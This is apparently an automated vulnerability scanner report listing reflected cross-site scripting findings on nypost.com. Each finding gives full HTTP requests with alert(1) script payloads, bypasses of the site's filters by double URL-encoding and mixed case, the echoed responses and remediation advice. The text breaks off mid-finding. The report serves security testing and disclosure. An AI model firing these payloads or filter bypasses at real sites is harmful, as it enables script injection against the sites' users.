GET /rw/SysConfig/WebPortal/nypost/unica/unica.jscc4ee<script>alert(1)</script>350effa176c HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 701 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:56 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ca8e%253c%252fScRiPt%2520%253e4d6e84c151a was submitted in the REST URL parameter 2. This input was echoed as 7ca8e</ScRiPt >4d6e84c151a in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /t/Andy%20Pettitte%207ca8e%253c%252fScRiPt%2520%253e4d6e84c151a HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48150 Content-Type: text/html;charset=UTF-8 ETag: 55e942ca-066d-4059-88cf-6d23265cc1b8 Cache-Control: max-age=900 Date: Tue, 08 Feb 2011 05:45:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... <script type="text/javascript">
var sitezone = 'topic'; var kws = 'Andy Pettitte 7ca8e</ScRiPt >4d6e84c151a'; var kvs = ''; var adexc = '';
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67000%2522%253b4f4bf86fb9a was submitted in the REST URL parameter 2. This input was echoed as 67000";4f4bf86fb9a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /t/Andy%20Pettitte%2067000%2522%253b4f4bf86fb9a HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48087 Content-Type: text/html;charset=UTF-8 ETag: fa8afd01-4958-4e80-a68c-5ae22f672671 Cache-Control: max-age=888 Date: Tue, 08 Feb 2011 05:45:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... 0;return b;} var ni=_hbEvent("pv");ni.vpc="ni.250u";ni.gn="a.nypost.com";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aedea"%3b5afe9d0d10 was submitted in the REST URL parameter 2. This input was echoed as aedea";5afe9d0d10 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /t/Charlie%20Sheenaedea"%3b5afe9d0d10 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48065 Content-Type: text/html;charset=UTF-8 ETag: 2f4f8e87-e36d-4db7-8327-64938314cf56 Cache-Control: max-age=900 Date: Tue, 08 Feb 2011 05:45:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... =0;return b;} var ni=_hbEvent("pv");ni.vpc="ni.250u";ni.gn="a.nypost.com";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70663%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a458660819 was submitted in the REST URL parameter 2. This input was echoed as 70663</script><script>alert(1)</script>5a458660819 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /t/Charlie%20Sheen70663%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a458660819 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48345 Content-Type: text/html;charset=UTF-8 ETag: 3d1de66b-8cca-40e6-96ec-496c5790bb82 Cache-Control: max-age=900 Date: Tue, 08 Feb 2011 05:45:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... <script type="text/javascript">
var sitezone = 'topic'; var kws = 'Charlie Sheen70663</script><script>alert(1)</script>5a458660819'; var kvs = ''; var adexc = '';
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 347b2%253cscript%253ealert%25281%2529%253c%252fscript%253ec7800b1805a was submitted in the REST URL parameter 2. This input was echoed as 347b2<script>alert(1)</script>c7800b1805a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /t/Charlie%20Sheen347b2%253cscript%253ealert%25281%2529%253c%252fscript%253ec7800b1805a HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48264 Content-Type: text/html;charset=UTF-8 ETag: d279812b-b323-4ec1-a2cf-465d0a63e676 Cache-Control: max-age=900 Date: Tue, 08 Feb 2011 05:45:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... RIC 3 is used for Blogs. Param 2 = Blogs link. ni.hc4= "";//CUSTOM METRIC 4 is used for Real Estate (outside application - do not use this metric!) var cv = _hbEvent("cv"); cv.c5= "/t/Charlie Sheen347b2<script>alert(1)</script>c7800b1805a|Charlie Sheen347b2<script> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19a48"-alert(1)-"338cfffb690 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /t/Fred%20Wilpon19a48"-alert(1)-"338cfffb690 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48137 Content-Type: text/html;charset=UTF-8 ETag: 3a4ad428-9150-4127-aa32-3a6a8afd91df Cache-Control: max-age=900 Date: Tue, 08 Feb 2011 05:45:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... _C=0;return b;} var ni=_hbEvent("pv");ni.vpc="ni.250u";ni.gn="a.nypost.com";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1ecb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecd07ad74b54 was submitted in the REST URL parameter 2. This input was echoed as a1ecb</script><script>alert(1)</script>cd07ad74b54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /t/Fred%20Wilpona1ecb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecd07ad74b54 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48331 Content-Type: text/html;charset=UTF-8 ETag: cc234938-300e-4431-b9f8-9ef2b725967f Cache-Control: max-age=865 Date: Tue, 08 Feb 2011 05:45:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... <script type="text/javascript">
var sitezone = 'topic'; var kws = 'Fred Wilpona1ecb</script><script>alert(1)</script>cd07ad74b54'; var kvs = ''; var adexc = '';
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 102b0%253cscript%253ealert%25281%2529%253c%252fscript%253e10de00e6326 was submitted in the REST URL parameter 2. This input was echoed as 102b0<script>alert(1)</script>10de00e6326 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /t/Fred%20Wilpon102b0%253cscript%253ealert%25281%2529%253c%252fscript%253e10de00e6326 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48250 Content-Type: text/html;charset=UTF-8 ETag: 0808b65c-72a6-45a3-aefd-13ed01796622 Cache-Control: max-age=885 Date: Tue, 08 Feb 2011 05:45:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... ETRIC 3 is used for Blogs. Param 2 = Blogs link. ni.hc4= "";//CUSTOM METRIC 4 is used for Real Estate (outside application - do not use this metric!) var cv = _hbEvent("cv"); cv.c5= "/t/Fred Wilpon102b0<script>alert(1)</script>10de00e6326|Fred Wilpon102b0<script> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd7f8%253c%252fScRiPt%2520%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ada47a20d8 was submitted in the REST URL parameter 2. This input was echoed as dd7f8</ScRiPt ><script>alert(1)</script>9ada47a20d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /t/James%20Francodd7f8%253c%252fScRiPt%2520%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9ada47a20d8 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48349 Content-Type: text/html;charset=UTF-8 ETag: a31a01f7-9f22-476d-981c-e7262b42d553 Cache-Control: max-age=883 Date: Tue, 08 Feb 2011 05:45:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... C=0;return b;} var ni=_hbEvent("pv");ni.vpc="ni.250u";ni.gn="a.nypost.com";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f86fe%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b2f5562500 was submitted in the REST URL parameter 2. This input was echoed as f86fe</script><script>alert(1)</script>8b2f5562500 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /t/James%20Francof86fe%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b2f5562500 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48338 Content-Type: text/html;charset=UTF-8 ETag: 23a2b886-466a-4589-9452-44dd87f6a7fa Cache-Control: max-age=900 Date: Tue, 08 Feb 2011 05:45:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... <script type="text/javascript">
var sitezone = 'topic'; var kws = 'James Francof86fe</script><script>alert(1)</script>8b2f5562500'; var kvs = ''; var adexc = '';
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61af5%253cscript%253ealert%25281%2529%253c%252fscript%253ed43cadbcc39 was submitted in the REST URL parameter 2. This input was echoed as 61af5<script>alert(1)</script>d43cadbcc39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /t/James%20Franco61af5%253cscript%253ealert%25281%2529%253c%252fscript%253ed43cadbcc39 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48257 Content-Type: text/html;charset=UTF-8 ETag: c039c872-32df-430f-81c9-17ec28e482df Cache-Control: max-age=879 Date: Tue, 08 Feb 2011 05:45:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... TRIC 3 is used for Blogs. Param 2 = Blogs link. ni.hc4= "";//CUSTOM METRIC 4 is used for Real Estate (outside application - do not use this metric!) var cv = _hbEvent("cv"); cv.c5= "/t/James Franco61af5<script>alert(1)</script>d43cadbcc39|James Franco61af5<script> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cea96"%3bf96074f9079 was submitted in the REST URL parameter 2. This input was echoed as cea96";f96074f9079 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /t/Justin%20Biebercea96"%3bf96074f9079 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48072 Content-Type: text/html;charset=UTF-8 ETag: 006d777a-d782-4b36-bba9-d15463895592 Cache-Control: max-age=900 Date: Tue, 08 Feb 2011 05:45:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... =0;return b;} var ni=_hbEvent("pv");ni.vpc="ni.250u";ni.gn="a.nypost.com";
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5af9f%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c7ca2bb14 was submitted in the REST URL parameter 2. This input was echoed as 5af9f<script>alert(1)</script>a7c7ca2bb14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /t/Justin%20Bieber5af9f%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c7ca2bb14 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48264 Content-Type: text/html;charset=UTF-8 ETag: f8f3fafa-0135-4c8f-ac89-e67847e06144 Cache-Control: max-age=900 Date: Tue, 08 Feb 2011 05:45:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... RIC 3 is used for Blogs. Param 2 = Blogs link. ni.hc4= "";//CUSTOM METRIC 4 is used for Real Estate (outside application - do not use this metric!) var cv = _hbEvent("cv"); cv.c5= "/t/Justin Bieber5af9f<script>alert(1)</script>a7c7ca2bb14|Justin Bieber5af9f<script> ...[SNIP]...
1.608. http://www.nypost.com/upost [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nypost.com
Path:
/upost
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 512ba"><script>alert(1)</script>92df3f4e9fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /upost?512ba"><script>alert(1)</script>92df3f4e9fb=1 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 48025 Content-Type: text/html;charset=UTF-8 Expires: Tue, 08 Feb 2011 05:43:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 08 Feb 2011 05:43:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis. ...[SNIP]... <a class="log" href="/login?redirect=/upost&512ba"><script>alert(1)</script>92df3f4e9fb=1"> ...[SNIP]...
The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 706db"><script>alert(1)</script>6cdcd614a58 was submitted in the channel parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video?channel=PostTopFilmStrip706db"><script>alert(1)</script>6cdcd614a58 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;
Response
